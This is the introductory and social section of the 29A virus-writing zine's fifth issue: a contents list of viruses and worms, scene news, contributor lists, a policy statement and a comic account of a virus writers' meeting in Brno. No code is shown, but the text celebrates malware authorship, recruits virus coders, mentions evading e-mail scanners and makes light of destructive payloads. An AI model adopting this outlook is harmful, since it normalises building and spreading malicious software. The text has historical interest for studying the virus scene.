Professional Documents
Culture Documents
Introduction VirusBuster/29A
News VirusBuster/29A
Contributors VirusBuster/29A
Membership VirusBuster/29A
Distribution VirusBuster/29A
Our greetings 29A staff
Policies and goals Darkman/29A
Secret area VirusBuster/29A
About the viewer VirusBuster/29A
VX meeting in Brno 2000 Benny/29A
A Bucket Of Letters Lord Julus/29A
Reference guide to VX sites VirusBuster/29A
Generally about VX scene Benny/29A
Articles:
Utilities:
Windows 95 / 98 / ME:
DarkMillennium Clau
Repus Super/29A
HenZe HenKy
Noise Bumblebee/29A
Espore HenKy
Putita HenKy
Estukista HenKy
Sentinel f0re
SVK Tcp/29A
Windows NT / 2000:
WinNT/Adonai HenKy
Win2K/Stream Benny/29A & Ratter
Win32 viruses:
Linux/LoTeK Wintermute
Linux/Zipworm! Vecna
I-Worm/Energy Benny/29A
I-Worm/Chainsaw T-2000/Immortal Riot
I-Worm/Icecubes f0re
I-Worm/Troodon Clau
I-Worm/XTC Benny/29A
HLP/Ayuda Bumblebee/29A
Macro/Furio The WalruS
Macro/Karma The WalruS
Macro/One jackie
PHP/Pirus MaskBits/VXI
CMD/r0bin-&-m4rian Nemo
DOS/ACG disasm Super/29A
Introduction
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Ancient guys in the VX scene could not believe it when they heard 29A group
was releasing his 5th issue in december, just 9 months after 4th issue. We
could say we scored a goal to the goal of release 29A magazine within a year,
as we promised in this same section in last issue.
In this new release we make a new promise: 29A will try to don't release
more huge issues as 4th one, or at least not due to MP3 files. Anyway, it's
29A group who decides what's released, being decission of each reader decide
if the zine deserves the download or not.
From here, we would like to thank very much all the contributors to 29A #5,
those ones who got their work published, and those ones that sent us stuff
to publish but we didn't. It's with the efforts of 29A members but also
contributors how 29A gets releases of quality, that's why we, in 29A, must be
grateful to them. We are also grateful to VaW for his intro for the zine.
Darkman, Lethal Mind, Reptile and Sopinky left 29A due their inactivity in
the group, Bumblebee and Prizzy left for personal problems and Mandragore
joined 29A. Regards and best whises to the ex-members.
You must notice: 29A issue 5 has to be extracted using Long FileName (LFN).
29Aers hope readers enjoy with this new production from 29A group, and also
that antivirus companies enjoy detecting and removing viruses released in our
zine, wishing more luck to ex-AVP than last time disinfecting GriYo's CTX or
detecting Bumblebee's 99 ways to die.
News
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Back in april...
HenKy left Matrix group and viruses, returning later to the scene. Anaktos
joined Matrix and the group released their first issue.
New virus group formed named Silicium Revolte. They disappeared in some
months and never released anything. Is this group disbanded? Any information
for the news section of 29A #6 would be appreciated.
Back in may...
Annual vx meeting was scheduled for 1st august somewhere in Czech republic
being unknown the exact location.
Variants of ILoveYou virus were still appearing all around the world being
the coder of the original virus unknown.
Back in june...
B0z0 left IKX group. The charismatic guy that used to be the leader of the
group left IKX group and the scene taking StarZer0 the responsability inside
the group.
Back in july...
Pascal Virus Team was formed. The time showed that PVT can not be named as
group.
SMF group released DVL issue 10. Duke, leader of SMF did another good work
with this release.
SMF informed that SST, a russian virus coder, was being investigated due:
"Creating, distribuiton and usage of harmful computer programs", according
russian criminal code. Actually SST is still releasing viruses.
AntiState Tortoise released the very first virus for Autocad 2000.
Kefrens group got disbanded and one of the members released posthumous
issue 1.
Evul, coderz.net owner and virus coder, had a car crash but he was not
very damaged fortunately.
Linezer0 Network 2K group released second issue. Black Jack left the group
and got a reply to the reasons he gave for his quit from his ex-group.
Back in august...
Feathered Serpents group announced their very first issue after some years
of activity (bad tongues would say inactivity). After a time DrOwl announced
the release had been cancelled, something that didn't surprise in the scene.
Vx annual meeting had place in Brno (.cz), but it didn't have too much
success. Only GriYo and GigaByte, vxers not from the "zone" were assitant of
the meeting. This situation should create a debate between people thinking
that meetings should be done in different places every year and people that
think meetings should be done in places where the amount of assistans would
be big. More information about the meeting can be found in this zine inside
an article written by Benny.
Lucky 2000 also known under other nicks, a famouse code ripper left the
scene.
Back in september...
Renegade, leader of ASM group released DIE #2. In a first release, zine
had a backdoor being fixed in a posterior release. Due the backdoor incident
Renegade left the scene:
Benny/29A and Ratter released the first virus for Win2K platform named
"Stream".
Back in october...
Jackie Qwerty, ex 29A member, informed that he had been father of a girl.
Another vx meeting had place in Valencia, Spain. Being this a "local" meet
it was more succesful than the international meeting. Well known vxers as
Billy Belcebu, The Mental Driller, Tcp, Super, Bumblebee and some other were
there.
Evul had to close Matrix's site in Coderz due the impact of Matrix virus
all over the world.
Nick Fitzgerald confirmed what some people were already thinking: Tests
performed by VTC (Hamburg) are corrupted.
Back in november...
ILoveYou virus reached record guiness due to be known as the most spreaded
virus ever.
A new virus channel named #vxers was created due to the discrepancies from
many vxers with the guys (Darkman, Evul, Knowdeth, Roadkil) managing #virus
channel.
AVP announced they were going to change the name of their product from AVP
to Kaspersky Anti-Virus. It seems like AVP people wanted to break business
relations with Central Command, american distributor of AVP, and to do this
they had to change the name.
A new group named Mions was created. Formed by Worf and Mimi as virus
collectors and Radix16 as virus coder.
In this month...
Maskbits released the first PHP virus, and later he left the scene.
Contributors
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
If you want to contribute to the next issue of 29A magazine, please mail us
at: darknode@oninet.es.
We'd like to thank GriYo/29A for the viewer, VaW for the intro and T-2000
for tips and ideas for the zine.
Further more we'd like to thank all the people who have contributed to this
issue of 29A, also for all the help and effort they put into this issue of
29A magazine. The list of contributors and what they've contributed with is
as follows:
Handle Contribution(s)
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Black Jack Demiurg
Black_Jack_VX@hotmail.com
www.coderz.net/blackjack
Clau DarkMillennium
clau@ultimatechaos.org Troodon
www.walrus.8k.com/
Doxtor L. Idele
<no e-mail>
<no url>
f0re Sentinel
f0revir@hotmail.com Icecubes
http://f0re.cjb.net
HenKy Adonai
henky_@LatinMail.com HenZe
members.es.tripod.de/lakasazul/henky.htm Espore
Putita
Estukista
MaskBits Pirus
vxindia@shadowvx.com
www.vxi.cjb.net
Nemo r0bin-&-m4rian
Nemo@deepzone.org
www.deepzone.org
T-2000 Chainsaw
T2000_@hotmail.com Win32 386+
Random-Number-In-Range Generator
www.immortalriot.cjb.net MIME/UUENCODE attachment encoders
SMTP client
Encrypted ZIP files to evade
e-mail gateway scanners
Vecna ZipWorm!
vecna@antisocial.com Muazzin SDK
<no url>
Wintermute LoTek
wintermute@mad.servicom.es
personal5.iddeo.es/wintrmute/indice.htm
ZeMacroKiller98 LaraCroft
zebulon@softel.fr
http://www.crosswinds.net/~zemacrokiller98/index.htm
|Zan H0rtiga
izan@deepzone.org
www.deepzone.org
Membership
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
If you think you have the profile we're searching for, please mail us a
little about yourself, your interests, which viruses you have coded so far,
etc. to: darknode@oninet.es.
If you want to mail 29A as a group, ie. every 29A member, please mail us
at the above e-mail address too.
The list of the current members, their origin and e-mail addresses is as
follows:
Most of our members have a homepage of their own, where you can find more
information about them their viruses, current projects, etc. Their URLs are
as follows:
Handle URL
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Benny http://benny29a.cjb.net
GriYo http://www.bi0.net
Lord Julus http://lordjulus.cjb.net
Mandragore http://www.multimania.com/mdrg
VirusBuster http://vtc.cjb.net
Distribution
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
I you think you must be in the previous list and you are not, fuck you!
And for all the guys/girls/things from #virus, nice and not so nice:
greetings ppl!
to all members of 29A, Ikx, Matrix and all the people from #virus a great
greeting and all the best !!!
Virii related
-------------
Benny: Psychedelic drugs are bad... but love marijuana!! :)
Billy Belceb£: A la pr¢xima kedada voy a llevar a un segurata de cybercaf‚ XD
Bumblebee: Hacer una poly gorda es cuesti¢n de ponerse (mucho, pero ponerse :)
Darkman: Come back to the VX!
GriYo: A ver si hacemos una poly conjunta :P =)
Lord Julus: Let's do a meta compo! :P (Joke. Very difficult! :)
Mental Driller: Errhm... :)
Mister Sandman: Menos mal que no me cambiaste por una escoba ;))
nigr0: Eso de Nigrogay, uhmm... habr que matar a Super XDDD
Super: Te ver‚ pronto :P
Tcp: Seeya soon! ;)
Vecna: Keep coding! Your viruses belong to the best!
VirusBuster: Esos peazos logs van a hacer que me retiren la cuenta XD
Wintermute: Ahora vas y te pasas al ping ino? :)
YbY: No te juntes con Billy que es gay y le van los hackers XDD
Zaxon: Oye, andest s que no se te v‚?
Anti-greetz
-----------
Fascism, Metallica
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[VirusBuster's greetings]ÄÄÄ
I'ld like to greet the people forming 29A, IKX and Matrix groups and next
people particullary: b0z0, Buddy Music, CyberYoda, Daniel, Del_Armg0, Duke,
Evul, foxz, Int13h, Jack Qwerty, Jackie, Leugim San, mgl, Mist, Mr Sandman,
Newton, Nigr0, Paddingx, PaX, Perikles, Raid, Rajaat, Renegade, Reptile,
SnakeMan, Secret, Somnium, Sopinky, Spanska, SSR, T-2000, Urgo, Vecna, Vein,
VicodinES, Wintermute, Worf, Ypsilon, Z0MBiE and Zulu.
Policies and goals
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
That's why you'll occasionally see a virus from 29A in the wild or carrying
a destructive payload, even though we do our very best to keep the number of
incidents down to a minimum.
Destructive payloads and the spreading of viruses is the reason why people
get in trouble, the reason why people like The Black Baron got arrested,
prosecuted, sentenced and finally jailed.
We code viruses for the fun of it, because it's our hobby, not because we
want to harm other people or to get ourselves into trouble.
Our goal is to create new, unique, interesting viruses and virus utilities
and to release 29A magazine on a regular and more frequent basis. Releasing
the magazine frequently has been a problem for us, however, we are getting
better but it is still something for us to work at.
We can not and will not be held responsible for whatever you (the reader)
decides to do with the contents of the 29A magazines nor can the group be
held responsible for the actions of any individual members.
Secret area
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Passwords for 29A magazine issue 1 and 2 can be found in the "Secret area"
article in 29A magazine issue 3.
The password for 29A magazine issue 4 is "29A 2000". You must type numbers
using the keys in the right side of the keyboard. (Don't forget to enable Num
Lock)
About the viewer
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
There are not available parameters or commands for this viewer, being
designed to be used with a mouse.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÄÄÄÄÄÄÄ´ Before the meeting ³ÄÄÄ¿
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÛ ³
³ ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ³
³ ³
³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³ ³
ÀÄÄÄÄÄÄ>³ There was a big disccusion before the meeting happened. Where ³
³ should the meeting be? Moscow, said someone, and that was the ³
³ final word. But becoz almost everyone who agreed with that said, ³
³ that he cant come, Darkman and I decided to make the meeting in ³
³ my city Brno in Czech Republic. ³
³ ³
³ First reactions were better than I expected. Many ppl wanted to ³
³ come, they were about 20+. I sent to everyone who asked me about ³
³ meeting mail, where was explained the program, accommodation, ³
³ local prizes etc... but something went wrong. Darkman, Lord Julus,³
³ and many spanish coderz and memberz of 29A couldn't come becoz of ³
³ problems with money and/or lack of time. The rest didn't answer me³
³ in two months, so it thought they can't or don't want to come. ³
³ ³
³ I reserved for all foreign ppl rooms in hotel and gave them the ³
³ address of not mentioned pub, that was supposed to work as our ³
³ own headquarterz :) ³
³ ³
³ Ppl from Czech Republic promised me to call me when they will be ³
³ able to come. ³
³ ³
³ The meeting started at the 31st of July 2000, at 12:00 CET. ³
³ ³
³ ³
³ Ppl that were officially on the meeting: ³
³ ³
³ - Benny/29A (Benny es typicamento Chec :) ³
³ - GigaByte (the only one female coder, alcoholic and pothead :) ³
³ - GriYo/29A (say weeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeed :) ³
³ - Maia (aka Odyssey) ³
³ - Ratter ³
³ - Skag (small hacker, big human) ³
³ - Mort/MATRiX ³
³ - Alko ³
³ - Axe ³
³ - Prizzy/29A (He doesn't spread viruses, but knowledge ;) ³
³ - Igi ( http://www.viry.cz ) ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÄÄÄÄÄÄÄ´ Start of the meeting ³ÄÄÄÄÄ¿
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÛ ³
³ ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ³
³ ³
³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³ ³
ÀÄÄÄÄÄÄ>³ The first day I was waiting for GigaByte and Skag. GigaByte ³
³ arrived at 2 o'clock with her grandfather. All the day I was ³
³ drinking beerz in the pub and when Skag (he is one hacker, living ³
³ in Brno) arrived, I was already pretty drunk. We, GigaByte, Skag ³
³ and me, started to drink more and more. GigaByte got drunk from ³
³ two small beerz and one Becherovka. After we left the pub, we ³
³ decided to teach GigaByte smoke a weed :) Unfortunately, GigaByte ³
³ didn't get stoned, becoz I hadn't enough weed :/ We went to one ³
³ disco (called Relax), where we had some tequillas. GigaByte got ³
³ totally drunk from two Vodka+Redbull. Heh, she told me that in ³
³ Belgium its very favourite combination. I also had one Vodka with ³
³ Redbull, but I wasn't drunk. But the tomorrow's morning, I felt ³
³ really pretty bad. I had totally red eyes and it took me some time³
³ to start to walk :). Fuck Giga, with Vodka and Redbull you are ³
³ drunk only the next day or what?! :P Hehehe... ³
³ ³
³ We also didn't forget that day to talk about viruses and hang on ³
³ IRC in cybercaffee :) ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÄÄÄÄÄÄÄ´ The famous 2nd day ³ÄÄÄÄÄ¿
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÛ ³
³ ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ³
³ ³
³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³ ³
ÀÄÄÄÄÄÄ>³ 2nd day we waited for GriYo, Maia (GriYo's gf), Ratter, Mort and ³
³ and Axe. Ratter arrived in the morning, Mort and Axe later. ³
³ GriYo told me that he will arrive to Prague and asked me, if I ³
³ could find someone to get him from Prague to Brno. I couldn't ³
³ find anyone, so I told GriYo to take a taxi. Finally, my father ³
³ found someone, but it was already late to say it to GriYo. GriYo ³
³ didn't know that I will wait for him in the airport in the Prague.³
³ Unfortunately, the airplane was late, meanwhile another airplane ³
³ from Spain arrived. GriYo wasn't there. I waited there for one and³
³ half of hour, then I decided to ask one lady from airport, if she ³
³ could ask in reproductorz all airport staff and ppl for guy called³
³ "GriYo". Hehehe, she was astonished when I said, that I'm looking ³
³ for "GriYo", without any surname :)) Noone with "GriYo" handle was³
³ not found, so I decided to leave. I was pretty angry, becoz I ³
³ spent about 90 USDs for the travel and I didn't find GriYo. ³
³ ³
³ While I was in Prague, Ratter and GigaByte went to cybercaffee. ³
³ They gave the first infos about meeting to *-zine guys, so they ³
³ could informate other ppl on their website. Axe and Mort also ³
³ arrived. They were all waiting for me in the pub. ³
³ ³
³ I arrived back to the pub in the evening, ofcoz without GriYo. I ³
³ saw GigaByte, Axe and Mort sitting silently in a pub (Ratter left ³
³ while I was on the way to Brno). Hehehe, GigaByte is very gewd in ³
³ english speaking, oppositelly to Axe and Mort, and those guys were³
³ affraid of Giga :). I told them, that the art of speaking in ³
³ english is to NOT show, that you don't understand and look like ³
³ you do :). They replied me: "Heh, well, and what do you think that³
³ we did all the time you were outta here, eh?" X-DDDD ³
³ ³
³ Axe decided to leave, so I was alone with Mort and GigaByte. I ³
³ didn't know what to do. Perhaps wait until the pub will close, and³
³ then go to home... we were joking that GriYo tried to smuggle some³
³ weed and now he is in jail. I told him, that if there will be any ³
³ problem or change, to call me. And he didn't. On the other hand, ³
³ ppl in jail can use telephone only once time, and it's not ³
³ possible that he would call ME (not lawyer) and say, that he won't³
³ come to meeting, hehe... :DDD And that time the receptionist ³
³ called to the pub and said, that in a hotel there are some ³
³ "strange" ppl talking in spanish. Fuck!!! Finally!!! ³
³ I went to hotel and shouted: "Oh my g0d, GriYo, Maia, where da ³
³ fuck you were?!" They looked at me like to mad :) It was really ³
³ gewd feeling to know, that they are OK. ³
³ ³
³ We went to the pub, had a dinner, some beerz and some TYPICAL ³
³ CZECH DRINKS (hello Maia :), such as Becherovka. Giga got drunk ³
³ again, becoz she mixed it with beerz and Whiskey :) ³
³ ³
³ GriYo and Maia were a bit tired from the travel (and Giga from ³
³ drinking :), so they went to sleep soon. I was drinking on and on,³
³ and now I can't remember how did I get home. Maybe by taxi? :) ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÄÄÄÄÄÄÄ´ 3rd day - the party time ³ÄÄÄÄÄ¿
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÛ ³
³ ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ³
³ ³
³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³ ³
ÀÄÄÄÄÄÄ>³ That morning it was really hard. I had pretty huge hangover (I ³
³ slept only for 4 hours) and I had to wake up very early becoz ³
³ Prizzy and Alko should arrive. When we met each other, we went to ³
³ the pub to have some beers. That time also arrived Ratter. Giga ³
³ woke up with hangover too and she couldn't understand how we can ³
³ drink 2,5 litres of beer for breakfast :) GriYo and Maia were OK. ³
³ ³
³ We decided to take some photos of one most famous AV company in ³
³ Czech Republic - Grisoft (c) Software. It was really funny, becoz ³
³ every minute could see us some AV freak and beat us :) Fortunately³
³ noone saw us... now, almost everyone has photo(s) with some ³
³ "weird" guys/girlz in front of the AV building :)) ³
³ ³
³ Then we went to one very famous pub in Brno. Everybody drank some ³
³ ( = many :) beerz. We left after some hours to smoke some weed. ³
³ GriYo again proved himself as very gewd guy and gave us his joint ³
³ from hash that he smuggled from Spain. The hash was from Maroco, ³
³ and it was a bit strong, and so some ppl get stoned immediatelly. ³
³ Then we visited some other pubs. In one pub there weren't any ³
³ ashtrays... you can imagine how the pub looked like after one ³
³ hour, eh? X-D ³
³ ³
³ We visited cybercaffee (meanwhile Skag arrived to meeting). I and ³
³ GigaByte were sitting at one computer. There was pretty funny ³
³ discussion on IRC. GigaByte: "Benny is st0ned" GigaByte: "GigaByte³
³ is drunk from one beer" GigaByte: "I am NOT" GigaByte: "She is" ³
³ GigaByte: "I AM NOT" GigaByte: "SHE IS!" And becoz we were on IRC ³
³ only under Giga's nickname (so noone could know that there are two³
³ ppl, someone replied: "Hey GigaByte, I can see the meeting is ³
³ pretty hard for yer brain, eh? You are getting schyzofrenic" :)) ³
³ ³
³ After that we decided to go to park and smoke again. Prizzy and ³
³ Axe couldn't watch us how we are smoking to the deadness and so ³
³ they went home. Prizzy didn't return. ³
³ ³
³ Then we went to one restaurant where usually eat AVerz. GriYo was ³
³ pretty overeated. We went to one university club (to put some ³
³ alcohol to our blood :), GriYo showed us on his notebook his ³
³ projects (AV program, Sniffer, IRC client, RDA engine, and many ³
³ other interesting programs) and after that we decided to go to ³
³ sleep. GriYo had full stomach and he needed to go to toilets. ³
³ The nearest toilets were about 100 metres from our place. GriYo ³
³ said "NO, I can't wait anymore", ran to the nearest building and ³
³ "dropped a shit" there. Hehehe, the building was the army academy!³
³ After that we wanted to piss the Grisoft building, but there were ³
³ many ppl near that. Heh, nevertheless, I think it was really gewd ³
³ target. Army academy in Brno in Czech Republic was infected by ³
³ GriYo's polymorphic stealth direct-infection one-day-resident ³
³ shit!!! :)) ³
³ ³
³ Another goal was that GigaByte got FIRSTLY in her life STONED. ³
³ Congrats Giga, keep working on yourself! :) ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÄÄÄÄÄÄÄ´ 4th day - the st0ned day ³ÄÄÄÄÄ¿
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÛ ³
³ ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ³
³ ³
³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³ ³
ÀÄÄÄÄÄÄ>³ Next morning - next huge hangover. This day we were walking thru ³
³ the city. We visited churches, many pubs, crypt (we saw preserved ³
³ corpses :), teashops (our favourite place, there we could smoke ³
³ some very good and strong tabacco from waterpipe) and so on. ³
³ GigaByte, well known non-smoking VXer (:-) also smoked. In the ³
³ evening we went to our favourite park to smoke something. I won ³
³ the contest "who will smoke more hash". Well, as Giga said, I ³
³ looked like vampire becoz of my veeeeeeeeeery red eyes :) Many ppl³
³ couldn't walk and talk becoz of that great amount of hash, ³
³ including me >D. ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÄÄÄÄÄÄÄ´ 5th day - GriYosoft action ³ÄÄÄÄÄ¿
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÛ ³
³ ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ³
³ ³
³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³ ³
ÀÄÄÄÄÄÄ>³ Previous day, after we consumed many beerz and weed, we wanted to ³
³ show the Grisoft (czech AV company) and to everybody our presence ³
³ on the meeting in Brno. We wanted to make something famous on our ³
³ meeting. We wanted to create some poster about meeting and ³
³ distribute it all around Brno. We decided to write to A4 paper ³
³ "GriYosoft, Vx meeting Brno 2000", sign there every visitor of the³
³ meeting and distribute about 40 copies. At Grisoft building we ³
³ placed there 2 copies and made some photos of that :) We did the ³
³ same at Czech Television building, high-school, some computer ³
³ shops and railway station, really :))) ³
³ After that we went to pool club to celibrate :) I was drunk from ³
³ 15 beerz I drank all the day and GigaByte from vodka+redbull ³
³ again :) When we were totally drunk, Gigabyte showed us the source³
³ code of Scrambler virus. Heh, GriYo and I started discussion with ³
³ Giga on the theme "what could be done better", "what could be more³
³ optimized" and "why is ASM better than HLLs". Although Giga could ³
³ not talk becoz of alcohol in her blood, GriYo and I started to ³
³ teach her assembler. Wow, Gigabyte, HLL coder started to ³
³ understand assembler :) Also, good stuff is that she remembers ³
³ something from that :) ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÄÄÄÄÄÄÄ´ 6th day - The last day ³ÄÄÄÄÄ¿
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÛ ³
³ ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ³
³ ³
³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³ ³
ÀÄÄÄÄÄÄ>³ In the morning Igi (one czech guy, he has webpage about viruses ³
³ and antiviruses, news etc - http://www.viry.cz) arrived. Again we ³
³ visited teashops, pubs and some parks, where we used to smoke. ³
³ That was also the last day. Everybody was very tired from that ³
³ non-stop drinking and smoking. Our stomachs were burned by alcohol³
³ and pillows by dust from joints and pipes :) In the night, we ³
³ visited one pool club... we played pool and drank more and more. ³
³ Becoz everybody was tired and becoz GriYo, Maia and Giga had to ³
³ wake up early, we decided to go to sleep. Meeting was in the end. ³
³ On my way to home I and Skag sticked some GriYosoft posters in the³
³ city... nice end of meeting :P ³
³ ³
